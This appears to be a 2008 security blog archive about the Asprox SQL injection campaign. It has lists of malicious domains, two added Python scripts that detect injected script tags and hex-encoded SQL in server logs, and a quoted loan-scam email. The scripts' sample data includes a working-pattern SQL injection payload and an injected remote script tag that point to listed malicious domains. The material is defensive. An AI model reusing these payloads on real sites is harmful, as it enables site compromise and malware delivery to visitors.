Thursday, 3 July 2008

Asprox domains: 3/7/08 and ngg.js

The Asprox domains used in the current round of SQL Injection attacks have shifted again, the ones to check for or block are:

  • adwadb.mobi
  • allocbn.mobi
  • canclvr.com
  • catdbw.mobi
  • ktrcom.com
  • lokriet.com
  • mainbvd.com
  • portwbr.com
  • stiwdd.com
  • testwvr.com
  • upcomd.com
  • ucomddv.com
The malicious JavaScript file has also changed to ngg.js (usually it is b.js or m.js or similar). If you're using Google Alerts or similar to monitor your own site or sites of interest, you might want to change the search string to something like "script src=http:" .js site:oceanic-air.com (replacing the domain name with the site you want to monitor).
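The search-engine alert above only tells you after the fact; the same check can be run directly against your own pages. The following is an added example, not code from the original post: it parses an HTML document, lists every off-site script it loads, and flags those pointing at the domains listed above or using the script names seen in these attacks. The sample page, the trusted host name and the IP address in it are constructed for illustration.

```python
# Added example (not from the original post): report <script src=...> tags
# that look injected, using the domain list and script names from the post.
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains from the 3 July post.
ASPROX_DOMAINS = {
    "adwadb.mobi", "allocbn.mobi", "canclvr.com", "catdbw.mobi", "ktrcom.com",
    "lokriet.com", "mainbvd.com", "portwbr.com", "stiwdd.com", "testwvr.com",
    "upcomd.com", "ucomddv.com",
}
# Script file names the post says these attacks use.
SUSPECT_SCRIPT_NAMES = {"ngg.js", "b.js", "m.js"}


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def find_injected_scripts(html, trusted_hosts, blocked_domains=ASPROX_DOMAINS):
    """Return a list of (src, reason) for script tags that look injected.

    trusted_hosts: hostnames you legitimately load scripts from (your own
    site, your CDN). Relative and first-party scripts are ignored; anything
    else is reported, with a more specific reason for known Asprox domains
    and for the script names used in these attacks on an unknown host.
    """
    parser = _ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src in parser.sources:
        parsed = urlparse(src)
        host = (parsed.hostname or "").lower()
        script_name = parsed.path.rsplit("/", 1)[-1].lower()
        if not host or host in trusted_hosts:
            continue  # relative or first-party script: fine
        if host in blocked_domains or any(host.endswith("." + d) for d in blocked_domains):
            findings.append((src, "known Asprox domain"))
        elif script_name in SUSPECT_SCRIPT_NAMES:
            findings.append((src, "Asprox-style script name on unknown host"))
        else:
            findings.append((src, "off-site script"))
    return findings


# Constructed sample page: one legitimate CDN script, one injected tag using
# a listed domain (unquoted attribute, as these attacks wrote it), and one
# using a suspect script name on an unknown host (address is illustrative).
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="http://www.example-cdn.net/lib.js"></script>
</head><body><p>Product list</p>
<script src=http://adwadb.mobi/ngg.js></script>
<script src="http://198.51.100.7/m.js"></script>
</body></html>"""

if __name__ == "__main__":
    for src, reason in find_injected_scripts(SAMPLE_PAGE, {"www.example-cdn.net"}):
        print(f"{reason}: {src}")
```

Feed it the HTML you fetch from your own site (or from your database-backed templates) and treat any "off-site script" you do not recognise as worth a look; the other two reasons are the ones to act on immediately.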

Wednesday, 2 July 2008

Asprox domains: 2/7/08

These seem to be the currently active domains used in the Asprox SQL Injection attack. Registrar of choice at the moment is Vivids Media GMBH (if they really exist) via Directi Internet Solutions (publicdomainregistry.com).

  • adupd.mobi
  • adwste.mobi
  • bnrupdate.mobi
  • cntrl62.com
  • config73.com
  • cont67.com
  • csl24.com
  • debug73.com
  • default37.com
  • get49.net
  • pid72.com
  • pid76.net
  • web923.com

Best advice is to block access to these sites and check your logs.
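"Check your logs" is easier with something that does the decoding for you: the injected SQL in these attacks arrives as a hex literal inside CAST(0x... AS VARCHAR), so the domain being planted is not visible in the raw log line. The following is an added example, not code from the original post or the Bloombit article it mentions: it parses access-log lines, URL-decodes the request, decodes any CAST hex literal (VARCHAR as single-byte text, NVARCHAR as UTF-16LE), and reports lines that either carry such a literal or mention one of the domains listed above anywhere in the request, referer or decoded payload. The log lines, IP addresses and the hex literal are constructed; the pattern is for Apache/NCSA combined format, and IIS W3C logs would need their own regular expression.

```python
# Added example (not from the original post): scan web server access logs
# for hex-encoded SQL and for references to the domains listed in the post.
import re
from urllib.parse import unquote

# Domains from the 2 July post.
ASPROX_DOMAINS = {
    "adupd.mobi", "adwste.mobi", "bnrupdate.mobi", "cntrl62.com", "config73.com",
    "cont67.com", "csl24.com", "debug73.com", "default37.com", "get49.net",
    "pid72.com", "pid76.net", "web923.com",
}

# Apache/NCSA combined log format (assumption: adjust for IIS W3C logs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# The hex-literal trick: CAST(0x... AS VARCHAR(n)) or AS NVARCHAR(n).
CAST_HEX_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)
DOMAIN_RE = re.compile(r"[a-z0-9.-]+\.(?:mobi|com|net)", re.IGNORECASE)


def decode_cast_hex(text):
    """Decode every CAST(0x.. AS VARCHAR/NVARCHAR) literal found in text."""
    decoded = []
    for hex_str, kind in CAST_HEX_RE.findall(text):
        try:
            raw = bytes.fromhex(hex_str)
        except ValueError:  # odd-length or otherwise malformed literal
            continue
        # NVARCHAR literals are UTF-16LE; VARCHAR ones are single-byte text.
        enc = "utf-16-le" if kind.upper() == "NVARCHAR" else "latin-1"
        decoded.append(raw.decode(enc, errors="replace"))
    return decoded


def scan_log(lines, blocked_domains=ASPROX_DOMAINS):
    """Return one finding dict per suspicious log line, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = unquote(m.group("url"))
        payloads = decode_cast_hex(url)
        haystack = " ".join([url, m.group("referer"), m.group("ua")] + payloads)
        hits = {d.lower() for d in DOMAIN_RE.findall(haystack)} & blocked_domains
        if payloads or hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "encoded_sql": bool(payloads),
                "domains": sorted(hits),
                "decoded": payloads,
            })
    return findings


# Constructed sample log. A real log shows the hex literal inline; it is
# built here from the string it encodes so the example stays readable.
_HEX = "<script src=http://adupd.mobi/b.js></script>".encode().hex()
SAMPLE_LOG = [
    '198.51.100.23 - - [02/Jul/2008:10:14:07 +0100] "GET /products.asp?id=12 HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [02/Jul/2008:10:14:09 +0100] "GET /products.asp?id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x'
    + _HEX + '%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '198.51.100.44 - - [02/Jul/2008:10:20:31 +0100] "GET /news.html HTTP/1.1" 200 812 "http://cntrl62.com/b.js" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], "encoded SQL" if f["encoded_sql"] else "", f["domains"], f["decoded"])
```

The second sample line is the one to worry about even if the status code is 200 and nothing visible changed: the request carried encoded SQL, and decoding it shows which domain it tried to plant. The third line shows a visitor whose referer is one of the listed domains, which usually means a page somewhere is already serving the injected script.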

Monday, 30 June 2008

"Royal Alliance Financial Investment" scam

A slightly strange scam from some outfit pretending to be "Royal Alliance Financial Investment" offering a low-cost loan. The initial email does not ask for much in the way of personal data, presumably that comes as the next step.

There is no such company as "Royal Alliance Financial Investment" in the UK. Originating IP is 196.216.69.54 which is allocated to Swift Global Kenya Limited in Nairobi. Finance companies do not generally use free email accounts to solicit business, and the address is clearly wrong. Avoid.
From: "Royal Alliance Financial Investment"
Date: Mon, June 30, 2008 3:43 pm


Royal Alliance Financial Investment
(Financial Aid Professionals)
Contant Address:85 Fleet Street.
London EC4Y 1AE.
Manchester United Kingdom.


Are you searching for a Genuine loan? at an affordable interest rate ?
processed within 4 to 6 working days. Have you been turned down constantly
by your Banks and other financial institutions? The goodnews is here !!!

Welcome to Royal Alliance Financial Investment,interest rate at 3%.It
gladdens our
hearts to bring to your notice that we offer all kinds of loan to any
part of the world.Being a licensed and registered company under the
finance ministry here in the United Kingdom we make available to customers
legitimate loan offers that are quick and affordable with interest rate at
a mere 3%.

Our Packages include:*Home Loan *Auto Loan*Mortgage Loan*Business
Loan*International Loan*Personal Loan*And Much More.

Please if you are delighted and interested in our financial offer,Do not
hesitate to contact us if in need of our service as you will be required
to furnish us with the following details to commence with the process of
your loan sum accordingly

1st INFORMATIONS NEEDED ARE

First Name:___________________________
Last Name:____________________________
Gender:_______________________________
Marital status:_______________________
Contact Address:______________________
City/Zip code:________________________
Country:______________________________
Date of Birth:________________________
Amount Needed as Loan:________________
Loan Duration:________________________
Monthly Income/Yearly Income:_________
Occupation:___________________________
Business name:________________________
Purpose for Loan:_____________________
Phone:________________________________
Fax:__________________________________


Thanks For Your Patronage!


'Your Business Is Our Blessing'

Mr,Jerry Mccarthy,
London Operations Manager,
Contant Address:85 Fleet Street.
London EC4Y 1AE.
Manchester United Kingdom.
Email:royalalliance.finance02@gmail.com
visit.royalalliance@gmail.com

Asprox: new domains including .mobi

Another set of domains used in the Asprox SQL Injection attack: bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adwsupp.com, supbnr.com, suppadw.com, dl251.com, aspx49.com, kadport.com, tid62.com, and batch29.com.

It's the first time that I've seen .mobi used in this way. Blocking access to all .mobi domains will probably do little harm.

Thursday, 26 June 2008

Asprox: list of domains and mitigation steps

The folks over at Bloombit Software have a useful article called ASCII Encoded/Binary String Automated SQL Injection Attack which explains some of the technical details behind these attacks and also has another list of domains serving up malware which is useful to keep an eye on.

Asprox: app52.com, aspssl63.com, update34.com, appid37.com, asp707.com, westpacsecuresite.com

Another bunch of domains coming up in the latest batch of Asprox SQL Injection attacks: app52.com, aspssl63.com, update34.com, appid37.com, asp707.com, westpacsecuresite.com - check your logs for these.

Wednesday, 25 June 2008

Microsoft Security Advisory (954462) - Rise in SQL Injection Attacks Exploiting Unverified User Data Input

A timely advisory from Microsoft on SQL Injection attacks plus some tools to help secure your setup are available on KB954462 with more information here and ISC's commentary here.

Of particular interest is the free Scrawlr tool available from HP. That could be a useful way to see if your server is vulnerable before the bad guys find it.